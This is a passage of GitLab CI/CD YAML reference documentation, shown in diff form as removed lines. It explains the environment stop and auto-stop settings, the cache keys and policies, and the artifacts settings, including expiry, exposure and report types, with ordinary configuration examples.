review/$CI_COMMIT_REF_NAME - url: https://$CI_ENVIRONMENT_SLUG.example.com - on_stop: stop_review_app - -stop_review_app: - stage: deploy - variables: - GIT_STRATEGY: none - script: make delete-app - when: manual - environment: - name: review/$CI_COMMIT_REF_NAME - action: stop -``` - -In the above example, the `review_app` job deploys to the `review` -environment. A new `stop_review_app` job is listed under `on_stop`. -After the `review_app` job is finished, it triggers the -`stop_review_app` job based on what is defined under `when`. In this case, -it is set to `manual`, so it needs a [manual action](#whenmanual) from -the GitLab UI to run. - -Also in the example, `GIT_STRATEGY` is set to `none`. If the -`stop_review_app` job is [automatically triggered](../environments/index.md#stopping-an-environment), -the runner won't try to check out the code after the branch is deleted. - -The example also overwrites global variables. If your `stop` `environment` job depends -on global variables, use [anchor variables](#yaml-anchors-for-variables) when you set the `GIT_STRATEGY` -to change the job without overriding the global variables. - -The `stop_review_app` job is **required** to have the following keywords defined: - -- `when`, defined at either: - - [The job level](#when). - - [In a rules clause](#rules). If you use `rules:` and `when: manual`, you should - also set [`allow_failure: true`](#allow_failure) so the pipeline can complete - even if the job doesn't run. -- `environment:name` -- `environment:action` - -Additionally, both jobs should have matching [`rules`](#only--except) -or [`only/except`](#only--except) configuration. - -In the examples above, if the configuration is not identical: - -- The `stop_review_app` job might not be included in all pipelines that include the `review_app` job. -- It is not possible to trigger the `action: stop` to stop the environment automatically. - -#### `environment:auto_stop_in` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/20956) in GitLab 12.8. - -The `auto_stop_in` keyword is for specifying the lifetime of the environment, -that when expired, GitLab automatically stops them. - -For example, - -```yaml -review_app: - script: deploy-review-app - environment: - name: review/$CI_COMMIT_REF_NAME - auto_stop_in: 1 day -``` - -When the environment for `review_app` is created, the environment's lifetime is set to `1 day`. -Every time the review app is deployed, that lifetime is also reset to `1 day`. - -For more information, see -[the environments auto-stop documentation](../environments/index.md#stop-an-environment-after-a-certain-time-period) - -#### `environment:kubernetes` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/27630) in GitLab 12.6. - -Use the `kubernetes` keyword to configure deployments to a -[Kubernetes cluster](../../user/project/clusters/index.md) that is associated with your project. - -For example: - -```yaml -deploy: - stage: deploy - script: make deploy-app - environment: - name: production - kubernetes: - namespace: production -``` - -This configuration sets up the `deploy` job to deploy to the `production` -environment, using the `production` -[Kubernetes namespace](https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/). - -For more information, see -[Available settings for `kubernetes`](../environments/index.md#configure-kubernetes-deployments). - -NOTE: -Kubernetes configuration is not supported for Kubernetes clusters -that are [managed by GitLab](../../user/project/clusters/index.md#gitlab-managed-clusters). -To follow progress on support for GitLab-managed clusters, see the -[relevant issue](https://gitlab.com/gitlab-org/gitlab/-/issues/38054). - -#### `environment:deployment_tier` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/300741) in GitLab 13.10. - -Use the `deployment_tier` keyword to specify the tier of the deployment environment: - -```yaml -deploy: - script: echo - environment: - name: customer-portal - deployment_tier: production -``` - -For more information, -see [Deployment tier of environments](../environments/index.md#deployment-tier-of-environments). - -#### Dynamic environments - -Use CI/CD [variables](../variables/README.md) to dynamically name environments. - -For example: - -```yaml -deploy as review app: - stage: deploy - script: make deploy - environment: - name: review/$CI_COMMIT_REF_NAME - url: https://$CI_ENVIRONMENT_SLUG.example.com/ -``` - -The `deploy as review app` job is marked as a deployment to dynamically -create the `review/$CI_COMMIT_REF_NAME` environment. `$CI_COMMIT_REF_NAME` -is a [CI/CD variable](../variables/README.md) set by the runner. The -`$CI_ENVIRONMENT_SLUG` variable is based on the environment name, but suitable -for inclusion in URLs. If the `deploy as review app` job runs in a branch named -`pow`, this environment would be accessible with a URL like `https://review-pow.example.com/`. - -The common use case is to create dynamic environments for branches and use them -as Review Apps. You can see an example that uses Review Apps at -<https://gitlab.com/gitlab-examples/review-apps-nginx/>. - -### `cache` - -Use `cache` to specify a list of files and directories to -cache between jobs. You can only use paths that are in the local working copy. - -If `cache` is defined outside the scope of jobs, it's set -globally and all jobs use that configuration. - -Caching is shared between pipelines and jobs. Caches are restored before [artifacts](#artifacts). - -Read how caching works and find out some good practices in the -[caching dependencies documentation](../caching/index.md). - -#### `cache:paths` - -Use the `paths` directive to choose which files or directories to cache. Paths -are relative to the project directory (`$CI_PROJECT_DIR`) and can't directly link outside it. -You can use Wildcards that use [glob](https://en.wikipedia.org/wiki/Glob_(programming)) -patterns and: - -- In [GitLab Runner 13.0](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2620) and later, -[`doublestar.Glob`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#Match). -- In GitLab Runner 12.10 and earlier, -[`filepath.Match`](https://pkg.go.dev/path/filepath#Match). - -Cache all files in `binaries` that end in `.apk` and the `.config` file: - -```yaml -rspec: - script: test - cache: - paths: - - binaries/*.apk - - .config -``` - -Locally defined cache overrides globally defined options. The following `rspec` -job caches only `binaries/`: - -```yaml -cache: - paths: - - my/files - -rspec: - script: test - cache: - key: rspec - paths: - - binaries/ -``` - -The cache is shared between jobs, so if you're using different -paths for different jobs, you should also set a different `cache:key`. -Otherwise cache content can be overwritten. - -#### `cache:key` - -The `key` keyword defines the affinity of caching between jobs. -You can have a single cache for all jobs, cache per-job, cache per-branch, -or any other way that fits your workflow. You can fine tune caching, -including caching data between different jobs or even different branches. - -The `cache:key` variable can use any of the -[predefined variables](../variables/README.md). The default key, if not -set, is just literal `default`, which means everything is shared between -pipelines and jobs by default. - -For example, to enable per-branch caching: - -```yaml -cache: - key: "$CI_COMMIT_REF_SLUG" - paths: - - binaries/ -``` - -If you use **Windows Batch** to run your shell scripts you need to replace -`$` with `%`: - -```yaml -cache: - key: "%CI_COMMIT_REF_SLUG%" - paths: - - binaries/ -``` - -The `cache:key` variable can't contain the `/` character, or the equivalent -URI-encoded `%2F`. A value made only of dots (`.`, `%2E`) is also forbidden. - -You can specify a [fallback cache key](#fallback-cache-key) to use if the specified `cache:key` is not found. - -##### Multiple caches - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/32814) in GitLab 13.10. -> - [Feature Flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/321877), in GitLab 13.12. - -You can have a maximum of four caches: - -```yaml -test-job: - stage: build - cache: - - key: - files: - - Gemfile.lock - paths: - - vendor/ruby - - key: - files: - - yarn.lock - paths: - - .yarn-cache/ - script: - - bundle install --path=vendor - - yarn install --cache-folder .yarn-cache - - echo Run tests... -``` - -If multiple caches are combined with a [Fallback cache key](#fallback-cache-key), -the fallback is fetched multiple times if multiple caches are not found. - -#### Fallback cache key - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/1534) in GitLab Runner 13.4. - -You can use the `$CI_COMMIT_REF_SLUG` [variable](#variables) to specify your [`cache:key`](#cachekey). -For example, if your `$CI_COMMIT_REF_SLUG` is `test` you can set a job -to download cache that's tagged with `test`. - -If a cache with this tag is not found, you can use `CACHE_FALLBACK_KEY` to -specify a cache to use when none exists. - -In the following example, if the `$CI_COMMIT_REF_SLUG` is not found, the job uses the key defined -by the `CACHE_FALLBACK_KEY` variable: - -```yaml -variables: - CACHE_FALLBACK_KEY: fallback-key - -cache: - key: "$CI_COMMIT_REF_SLUG" - paths: - - binaries/ -``` - -##### `cache:key:files` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/18986) in GitLab v12.5. - -The `cache:key:files` keyword extends the `cache:key` functionality by making it easier -to reuse some caches, and rebuild them less often, which speeds up subsequent pipeline -runs. - -When you include `cache:key:files`, you must also list the project files that are used to generate the key, up to a maximum of two files. -The cache `key` is a SHA checksum computed from the most recent commits (up to two, if two files are listed) -that changed the given files. If neither file is changed in any commits, -the fallback key is `default`. - -```yaml -cache: - key: - files: - - Gemfile.lock - - package.json - paths: - - vendor/ruby - - node_modules -``` - -This example creates a cache for Ruby and Node.js dependencies that -is tied to current versions of the `Gemfile.lock` and `package.json` files. Whenever one of -these files changes, a new cache key is computed and a new cache is created. Any future -job runs that use the same `Gemfile.lock` and `package.json` with `cache:key:files` -use the new cache, instead of rebuilding the dependencies. - -##### `cache:key:prefix` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/18986) in GitLab v12.5. - -When you want to combine a prefix with the SHA computed for `cache:key:files`, -use the `prefix` keyword with `key:files`. -For example, if you add a `prefix` of `test`, the resulting key is: `test-feef9576d21ee9b6a32e30c5c79d0a0ceb68d1e5`. -If neither file is changed in any commits, the prefix is added to `default`, so the -key in the example would be `test-default`. - -Like `cache:key`, `prefix` can use any of the [predefined variables](../variables/README.md), -but cannot include: - -- the `/` character (or the equivalent URI-encoded `%2F`) -- a value made only of `.` (or the equivalent URI-encoded `%2E`) - -```yaml -cache: - key: - files: - - Gemfile.lock - prefix: ${CI_JOB_NAME} - paths: - - vendor/ruby - -rspec: - script: - - bundle exec rspec -``` - -For example, adding a `prefix` of `$CI_JOB_NAME` -causes the key to look like: `rspec-feef9576d21ee9b6a32e30c5c79d0a0ceb68d1e5` and -the job cache is shared across different branches. If a branch changes -`Gemfile.lock`, that branch has a new SHA checksum for `cache:key:files`. A new cache key -is generated, and a new cache is created for that key. -If `Gemfile.lock` is not found, the prefix is added to -`default`, so the key in the example would be `rspec-default`. - -#### `cache:untracked` - -Set `untracked: true` to cache all files that are untracked in your Git -repository: - -```yaml -rspec: - script: test - cache: - untracked: true -``` - -Cache all Git untracked files and files in `binaries`: - -```yaml -rspec: - script: test - cache: - untracked: true - paths: - - binaries/ -``` - -#### `cache:when` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/18969) in GitLab 13.5 and GitLab Runner v13.5.0. - -`cache:when` defines when to save the cache, based on the status of the job. You can -set `cache:when` to: - -- `on_success` (default): Save the cache only when the job succeeds. -- `on_failure`: Save the cache only when the job fails. -- `always`: Always save the cache. - -For example, to store a cache whether or not the job fails or succeeds: - -```yaml -rspec: - script: rspec - cache: - paths: - - rspec/ - when: 'always' -``` - -#### `cache:policy` - -The default behavior of a caching job is to download the files at the start of -execution, and to re-upload them at the end. Any changes made by the -job are persisted for future runs. This behavior is known as the `pull-push` cache -policy. - -If you know the job does not alter the cached files, you can skip the upload step -by setting `policy: pull` in the job specification. You can add an ordinary cache -job at an earlier stage to ensure the cache is updated from time to time: - -```yaml -stages: - - setup - - test - -prepare: - stage: setup - cache: - key: gems - paths: - - vendor/bundle - script: - - bundle install --deployment - -rspec: - stage: test - cache: - key: gems - paths: - - vendor/bundle - policy: pull - script: - - bundle exec rspec ... -``` - -Use the `pull` policy when you have many jobs executing in parallel that use caches. This -policy speeds up job execution and reduces load on the cache server. - -If you have a job that unconditionally recreates the cache without -referring to its previous contents, you can skip the download step. -To do so, add `policy: push` to the job. - -### `artifacts` - -Use `artifacts` to specify a list of files and directories that are -attached to the job when it [succeeds, fails, or always](#artifactswhen). - -The artifacts are sent to GitLab after the job finishes. They are -available for download in the GitLab UI if the size is not -larger than the [maximum artifact size](../../user/gitlab_com/index.md#gitlab-cicd). - -By default, jobs in later stages automatically download all the artifacts created -by jobs in earlier stages. You can control artifact download behavior in jobs with -[`dependencies`](#dependencies). - -When using the [`needs`](#artifact-downloads-with-needs) keyword, jobs can only download -artifacts from the jobs defined in the `needs` configuration. - -Job artifacts are only collected for successful jobs by default, and -artifacts are restored after [caches](#cache). - -[Read more about artifacts](../pipelines/job_artifacts.md). - -#### `dependencies` - -By default, all `artifacts` from previous stages -are passed to each job. However, you can use the `dependencies` keyword to -define a limited list of jobs to fetch artifacts from. You can also set a job to download no artifacts at all. - -To use this feature, define `dependencies` in context of the job and pass -a list of all previous jobs the artifacts should be downloaded from. - -You can define jobs from stages that were executed before the current one. -An error occurs if you define jobs from the current or an upcoming stage. - -To prevent a job from downloading artifacts, define an empty array. - -When you use `dependencies`, the status of the previous job is not considered. -If a job fails or it's a manual job that isn't triggered, no error occurs. - -The following example defines two jobs with artifacts: `build:osx` and -`build:linux`. When the `test:osx` is executed, the artifacts from `build:osx` -are downloaded and extracted in the context of the build. The same happens -for `test:linux` and artifacts from `build:linux`. - -The job `deploy` downloads artifacts from all previous jobs because of -the [stage](#stages) precedence: - -```yaml -build:osx: - stage: build - script: make build:osx - artifacts: - paths: - - binaries/ - -build:linux: - stage: build - script: make build:linux - artifacts: - paths: - - binaries/ - -test:osx: - stage: test - script: make test:osx - dependencies: - - build:osx - -test:linux: - stage: test - script: make test:linux - dependencies: - - build:linux - -deploy: - stage: deploy - script: make deploy -``` - -##### When a dependent job fails - -> Introduced in GitLab 10.3. - -If the artifacts of the job that is set as a dependency are -[expired](#artifactsexpire_in) or -[deleted](../pipelines/job_artifacts.md#delete-job-artifacts), then -the dependent job fails. - -#### `artifacts:exclude` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15122) in GitLab 13.1 -> - Requires GitLab Runner 13.1 - -`exclude` makes it possible to prevent files from being added to an artifacts -archive. - -Similar to [`artifacts:paths`](#artifactspaths), `exclude` paths are relative -to the project directory. You can use Wildcards that use -[glob](https://en.wikipedia.org/wiki/Glob_(programming)) or -[`doublestar.PathMatch`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#PathMatch) patterns. - -For example, to store all files in `binaries/`, but not `*.o` files located in -subdirectories of `binaries/`: - -```yaml -artifacts: - paths: - - binaries/ - exclude: - - binaries/**/*.o -``` - -Unlike [`artifacts:paths`](#artifactspaths), `exclude` paths are not recursive. To exclude all of the contents of a directory, you can match them explicitly rather than matching the directory itself. - -For example, to store all files in `binaries/` but nothing located in the `temp/` subdirectory: - -```yaml -artifacts: - paths: - - binaries/ - exclude: - - binaries/temp/**/* -``` - -Files matched by [`artifacts:untracked`](#artifactsuntracked) can be excluded using -`artifacts:exclude` too. - -#### `artifacts:expire_in` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/16267) in GitLab 13.0 behind a disabled feature flag, the latest job artifacts are kept regardless of expiry time. -> - [Made default behavior](https://gitlab.com/gitlab-org/gitlab/-/issues/229936) in GitLab 13.4. -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/241026) in GitLab 13.8, keeping latest job artifacts can be disabled at the project level. -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/276583) in GitLab 13.9, keeping latest job artifacts can be disabled instance-wide. -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/321323) in GitLab 13.12, the latest pipeline artifacts are kept regardless of expiry time. - -Use `expire_in` to specify how long [job artifacts](../pipelines/job_artifacts.md) are stored before -they expire and are deleted. The `expire_in` setting does not affect: - -- Artifacts from the latest job, unless this keeping the latest job artifacts is: - - [Disabled at the project level](../pipelines/job_artifacts.md#keep-artifacts-from-most-recent-successful-jobs). - - [Disabled instance-wide](../../user/admin_area/settings/continuous_integration.md#keep-the-latest-artifacts-for-all-jobs-in-the-latest-successful-pipelines). -- [Pipeline artifacts](../pipelines/pipeline_artifacts.md). It's not possible to specify an - expiration date for these: - - Pipeline artifacts from the latest pipeline are kept forever. - - Other pipeline artifacts are erased after one week. - -The value of `expire_in` is an elapsed time in seconds, unless a unit is provided. Valid values -include: - -- `'42'` -- `42 seconds` -- `3 mins 4 sec` -- `2 hrs 20 min` -- `2h20min` -- `6 mos 1 day` -- `47 yrs 6 mos and 4d` -- `3 weeks and 2 days` -- `never` - -To expire artifacts one week after being uploaded: - -```yaml -job: - artifacts: - expire_in: 1 week -``` - -The expiration time period begins when the artifact is uploaded and stored on GitLab. If the expiry -time is not defined, it defaults to the -[instance wide setting](../../user/admin_area/settings/continuous_integration.md#default-artifacts-expiration) -(30 days by default). - -To override the expiration date and protect artifacts from being automatically deleted: - -- Use the **Keep** button on the job page. -- [In GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/22761), set the value of - `expire_in` to `never`. - -After their expiry, artifacts are deleted hourly by default (using a cron job), and are not -accessible anymore. - -#### `artifacts:expose_as` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/15018) in GitLab 12.5. - -Use the `expose_as` keyword to expose [job artifacts](../pipelines/job_artifacts.md) -in the [merge request](../../user/project/merge_requests/index.md) UI. - -For example, to match a single file: - -```yaml -test: - script: ["echo 'test' > file.txt"] - artifacts: - expose_as: 'artifact 1' - paths: ['file.txt'] -``` - -With this configuration, GitLab adds a link **artifact 1** to the relevant merge request -that points to `file1.txt`. To access the link, select **View exposed artifact** -below the pipeline graph in the merge request overview. - -An example that matches an entire directory: - -```yaml -test: - script: ["mkdir test && echo 'test' > test/file.txt"] - artifacts: - expose_as: 'artifact 1' - paths: ['test/'] -``` - -Note the following: - -- Artifacts do not display in the merge request UI when using variables to define the `artifacts:paths`. -- A maximum of 10 job artifacts per merge request can be exposed. -- Glob patterns are unsupported. -- If a directory is specified, the link is to the job [artifacts browser](../pipelines/job_artifacts.md#download-job-artifacts) if there is more than - one file in the directory. -- For exposed single file artifacts with `.html`, `.htm`, `.txt`, `.json`, `.xml`, - and `.log` extensions, if [GitLab Pages](../../administration/pages/index.md) is: - - Enabled, GitLab automatically renders the artifact. - - Not enabled, the file is displayed in the artifacts browser. - -#### `artifacts:name` - -Use the `name` directive to define the name of the created artifacts -archive. You can specify a unique name for every archive. The `artifacts:name` -variable can make use of any of the [predefined variables](../variables/README.md). -The default name is `artifacts`, which becomes `artifacts.zip` when you download it. - -To create an archive with a name of the current job: - -```yaml -job: - artifacts: - name: "$CI_JOB_NAME" - paths: - - binaries/ -``` - -To create an archive with a name of the current branch or tag including only -the binaries directory: - -```yaml -job: - artifacts: - name: "$CI_COMMIT_REF_NAME" - paths: - - binaries/ -``` - -If your branch-name contains forward slashes -(for example `feature/my-feature`) it's advised to use `$CI_COMMIT_REF_SLUG` -instead of `$CI_COMMIT_REF_NAME` for proper naming of the artifact. - -To create an archive with a name of the current job and the current branch or -tag including only the binaries directory: - -```yaml -job: - artifacts: - name: "$CI_JOB_NAME-$CI_COMMIT_REF_NAME" - paths: - - binaries/ -``` - -To create an archive with a name of the current [stage](#stages) and branch name: - -```yaml -job: - artifacts: - name: "$CI_JOB_STAGE-$CI_COMMIT_REF_NAME" - paths: - - binaries/ -``` - ---- - -If you use **Windows Batch** to run your shell scripts you need to replace -`$` with `%`: - -```yaml -job: - artifacts: - name: "%CI_JOB_STAGE%-%CI_COMMIT_REF_NAME%" - paths: - - binaries/ -``` - -If you use **Windows PowerShell** to run your shell scripts you need to replace -`$` with `$env:`: - -```yaml -job: - artifacts: - name: "$env:CI_JOB_STAGE-$env:CI_COMMIT_REF_NAME" - paths: - - binaries/ -``` - -#### `artifacts:paths` - -Paths are relative to the project directory (`$CI_PROJECT_DIR`) and can't directly -link outside it. You can use Wildcards that use [glob](https://en.wikipedia.org/wiki/Glob_(programming)) -patterns and: - -- In [GitLab Runner 13.0](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2620) and later, -[`doublestar.Glob`](https://pkg.go.dev/github.com/bmatcuk/doublestar@v1.2.2?tab=doc#Match). -- In GitLab Runner 12.10 and earlier, -[`filepath.Match`](https://pkg.go.dev/path/filepath#Match). - -To restrict which jobs a specific job fetches artifacts from, see [dependencies](#dependencies). - -Send all files in `binaries` and `.config`: - -```yaml -artifacts: - paths: - - binaries/ - - .config -``` - -To disable artifact passing, define the job with empty [dependencies](#dependencies): - -```yaml -job: - stage: build - script: make build - dependencies: [] -``` - -You may want to create artifacts only for tagged releases to avoid filling the -build server storage with temporary build artifacts. - -Create artifacts only for tags (`default-job` doesn't create artifacts): - -```yaml -default-job: - script: - - mvn test -U - rules: - - if: $CI_COMMIT_BRANCH - -release-job: - script: - - mvn package -U - artifacts: - paths: - - target/*.war - rules: - - if: $CI_COMMIT_TAG -``` - -You can use wildcards for directories too. For example, if you want to get all the files inside the directories that end with `xyz`: - -```yaml -job: - artifacts: - paths: - - path/*xyz/* -``` - -#### `artifacts:public` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/49775) in GitLab 13.8 -> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. -> - It's disabled on GitLab.com. -> - It's recommended for production use. - -Use `artifacts:public` to determine whether the job artifacts should be -publicly available. - -The default for `artifacts:public` is `true` which means that the artifacts in -public pipelines are available for download by anonymous and guest users: - -```yaml -artifacts: - public: true -``` - -To deny read access for anonymous and guest users to artifacts in public -pipelines, set `artifacts:public` to `false`: - -```yaml -artifacts: - public: false -``` - -#### `artifacts:reports` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/20390) in GitLab 11.2. -> - Requires GitLab Runner 11.2 and above. - -Use [`artifacts:reports`](#artifactsreports) -to collect test reports, code quality reports, and security reports from jobs. -It also exposes these reports in the GitLab UI (merge requests, pipeline views, and security dashboards). - -The test reports are collected regardless of the job results (success or failure). -You can use [`artifacts:expire_in`](#artifactsexpire_in) to set up an expiration -date for their artifacts. - -If you also want the ability to browse the report output files, include the -[`artifacts:paths`](#artifactspaths) keyword. - -##### `artifacts:reports:api_fuzzing` **(ULTIMATE)** - -> - Introduced in GitLab 13.4. -> - Requires GitLab Runner 13.4 or later. - -The `api_fuzzing` report collects [API Fuzzing bugs](../../user/application_security/api_fuzzing/index.md) -as artifacts. - -The collected API Fuzzing report uploads to GitLab as an artifact and is summarized in merge -requests and the pipeline view. It's also used to provide data for security dashboards. - -##### `artifacts:reports:cobertura` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/3708) in GitLab 12.9. -> - Requires [GitLab Runner](https://docs.gitlab.com/runner/) 11.5 and above. - -The `cobertura` report collects [Cobertura coverage XML files](../../user/project/merge_requests/test_coverage_visualization.md). -The collected Cobertura coverage reports upload to GitLab as an artifact -and display in merge requests. - -Cobertura was originally developed for Java, but there are many -third party ports for other languages like JavaScript, Python, Ruby, and so on. - -##### `artifacts:reports:codequality` - -> - Introduced in GitLab 11.5. -> - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/212499) to GitLab Free in 13.2. -> - Requires GitLab Runner 11.5 and above. - -The `codequality` report collects [Code Quality issues](../../user/project/merge_requests/code_quality.md) -as artifacts. - -The collected Code Quality report uploads to GitLab as an artifact and is summarized in merge requests. - -##### `artifacts:reports:container_scanning` **(ULTIMATE)** - -> - Introduced in GitLab 11.5. -> - Requires GitLab Runner 11.5 and above. - -The `container_scanning` report collects [Container Scanning vulnerabilities](../../user/application_security/container_scanning/index.md) -as artifacts. - -The collected Container Scanning report uploads to GitLab as an artifact and -is summarized in merge requests and the pipeline view. It's also used to provide data for security -dashboards. - -##### `artifacts:reports:coverage_fuzzing` **(ULTIMATE)** - -> - Introduced in GitLab 13.4. -> - Requires GitLab Runner 13.4 or later. - -The `coverage_fuzzing` report collects [coverage fuzzing bugs](../../user/application_security/coverage_fuzzing/index.md) -as artifacts. - -The collected coverage fuzzing report uploads to GitLab as an artifact and is summarized in merge -requests and the pipeline view. It's also used to provide data for security dashboards. - -##### `artifacts:reports:dast` **(ULTIMATE)** - -> - Introduced in GitLab 11.5. -> - Requires GitLab Runner 11.5 and above. - -The `dast` report collects [DAST vulnerabilities](../../user/application_security/dast/index.md) -as artifacts. - -The collected DAST report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security -dashboards. - -##### `artifacts:reports:dependency_scanning` **(ULTIMATE)** - -> - Introduced in GitLab 11.5. -> - Requires GitLab Runner 11.5 and above. - -The `dependency_scanning` report collects [Dependency Scanning vulnerabilities](../../user/application_security/dependency_scanning/index.md) -as artifacts. - -The collected Dependency Scanning report uploads to GitLab as an artifact and is summarized in merge requests and the pipeline view. It's also used to provide data for security -dashboards. - -##### `artifacts:reports:dotenv` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/17066) in GitLab 12.9. -> - Requires GitLab Runner 11.5 and later. - -The `dotenv` report collects a set of environment variables as artifacts. - -The collected variables are registered as runtime-created variables of the job, -which is useful to [set dynamic environment URLs after a job finishes](../environments/index.md#set-dynamic-environment-urls-after-a-job-finishes). - -There are a couple of exceptions to the [original dotenv rules](https://github.com/motdotla/dotenv#rules): - -- The variable key can contain only letters, digits, and underscores (`_`). -- The maximum size of the `.env` file is 5 KB. -- In GitLab 13.5 and older, the maximum number of inherited variables is 10. -- In [GitLab 13.6 and later](https://gitlab.com/gitlab-org/gitlab/-/issues/247913), - the maximum number of inherited variables is 20. -- Variable substitution in the `.env` file is not supported. -- The `.env` file can't have empty lines or comments (starting with `#`). -- Key values in the `env` file cannot have spaces or newline characters (`\n`), including when using single or double quotes. -- Quote escaping during parsing (`key = 'value'` -> `{key: "value"}`) is not supported. - -##### `artifacts:reports:junit` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/20390) in GitLab 11.2. -> - Requires GitLab Runner 11.2 and above. - -The `junit` report collects [JUnit report format XML files](https://www.ibm.com/support/knowledgecenter/en/SSQ2R2_14.1.0/com.ibm.rsar.analysis.codereview.cobol.doc/topics/cac_useresults_junit.html) -as artifacts. Although JUnit was originally developed in Java, there are many -third party ports for other -languages like JavaScript, Python, Ruby, and so on. - -See [Unit test reports](../unit_test_reports.md) for more details and examples. -Below is an example of collecting a JUnit report format XML file from Ruby's RSpec test tool: - -```yaml -rspec: - stage: test - script: - - bundle install - - rspec --format RspecJunitFormatter --out rspec.xml - artifacts: - reports: - junit: rspec.xml -``` - -The collected Unit test reports upload to GitLab as an artifact and display in merge requests. - -If the JUnit tool you use exports to multiple XML files, specify -multiple test report paths within a single job to -concatenate them into a single file. Use a filename pattern (`junit: rspec-*.xml`), -an array of filenames (`junit: [rspec-1.xml, rspec-2.xml, rspec-3.xml]`), or a -combination thereof (`junit: [rspec.xml, test-results/TEST-*.xml]`). - -##### `artifacts:reports:license_scanning` **(ULTIMATE)** - -> - Introduced in GitLab 12.8. -> - Requires GitLab Runner 11.5 and above. - -The `license_scanning` report collects [Licenses](../../user/compliance/license_compliance/index.md) -as artifacts. - -The License Compliance report uploads to GitLab as an artifact and displays automatically in merge requests and the pipeline view, and provide data for security -dashboards. - -##### `artifacts:reports:load_performance` **(PREMIUM)** - -> - Introduced in [GitLab 13.2](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/35260) in [GitLab Premium](https://about.gitlab.com/pricing/) 13.2. -> - Requires GitLab Runner 11.5 and above. - -The `load_performance` report collects [Load Performance Testing metrics](../../user/project/merge_requests/load_performance_testing.md) -as artifacts. - -The report is uploaded to GitLab as an artifact and is -shown in merge requests automatically. - -##### `artifacts:reports:metrics` **(PREMIUM)** - -> Introduced in GitLab 11.10. - -The `metrics` report collects [Metrics](../metrics_reports.md) -as artifacts. - -The collected Metrics report uploads to GitLab as an artifact and displays in merge requests. - -##### `artifacts:reports:browser_performance` **(PREMIUM)** - -> - Introduced in GitLab 11.5. -> - Requires GitLab Runner 11.5 and above. -> - [Name changed](https://gitlab.com/gitlab-org/gitlab/-/issues/225914) from `artifacts:reports:performance` in GitLab 14.0. - -The `browser_performance` report collects [Browser Performance Testing metrics](../../user/project/merge_requests/browser_performance_testing.md) -as artifacts. - -The collected Browser Performance report uploads to GitLab as an artifact and displays in merge requests. - -##### `artifacts:reports:requirements` **(ULTIMATE)** - -> - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/2859) in GitLab 13.1. -> - Requires GitLab Runner 11.5 and above. - -The `requirements` report collects `requirements.json` files as artifacts. - -The collected Requirements report uploads to GitLab as an artifact and -existing [requirements](../../user/project/requirements/index.md) are -marked as Satisfied. - -##### `artifacts:reports:sast` - -> - Introduced in GitLab 11.5. -> - Made [available in all tiers](https://gitlab.com/groups/gitlab-org/-/epics/2098) in GitLab 13.3. -> - Requires GitLab Runner 11.5 and above. - -The `sast` report collects [SAST vulnerabilities](../../user/application_security/sast/index.md) -as artifacts. - -The collected SAST report uploads to GitLab as an artifact and is summarized -in merge requests and the pipeline view. It's also used to provide data for security -dashboards. - -##### `artifacts:reports:secret_detection` - -> - Introduced in GitLab 13.1. -> - Made [available in all tiers](https://gitlab.com/gitlab-org/gitlab/-/issues/222788) in GitLab - 13.3. -> - Requires GitLab Runner 11.5 and above. - -The `secret-detection` report collects [detected secrets](../../user/application_security/secret_detection/index.md) -as artifacts. - -The collected Secret Detection report is uploaded to GitLab as an artifact and summarized -in the merge requests and pipeline view. It's also used to provide data for security -dashboards. - -##### `artifacts:reports:terraform` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207528) in GitLab 13.0. -> - Requires [GitLab Runner](https://docs.gitlab.com/runner/) 11.5 and above. - -The `terraform` report obtains a Terraform `tfplan.json` file. [JQ processing required to remove credentials](../../user/infrastructure/mr_integration.md#setup). The collected Terraform -plan report uploads to GitLab as an artifact and displays -in merge requests. For more information, see -[Output `terraform plan` information into a merge request](../../user/infrastructure/mr_integration.md). - -#### `artifacts:untracked` - -Use `artifacts:untracked` to add all Git untracked files as artifacts (along -with the paths defined in `artifacts:paths`). `artifacts:untracked` ignores configuration -in the repository's `.gitignore` file. - -Send all Git untracked files: - -```yaml -artifacts: - untracked: true -``` - -Send all Git untracked files and files in `binaries`: - -```yaml -artifacts: - untracked: true - paths: - - binaries/ -``` - -Send all untracked files but [exclude](#artifactsexclude) `*.txt`: - -```yaml -artifacts: - untracked: true - exclude: - - "*.txt" -``` - -#### `artifacts:when` - -Use `artifacts:when` to upload artifacts on job failure or despite the -failure. - -`artifacts:when` can be set to one of the following values: - -1. `on_success` (default): Upload artifacts only when the job succeeds. -1. `on_failure`: Upload artifacts only when the job fails. -1. `always`: Always upload artifacts. Useful, for example, when - [uploading artifacts](../unit_test_reports.md#viewing-junit-screenshots-on-gitlab) required to - 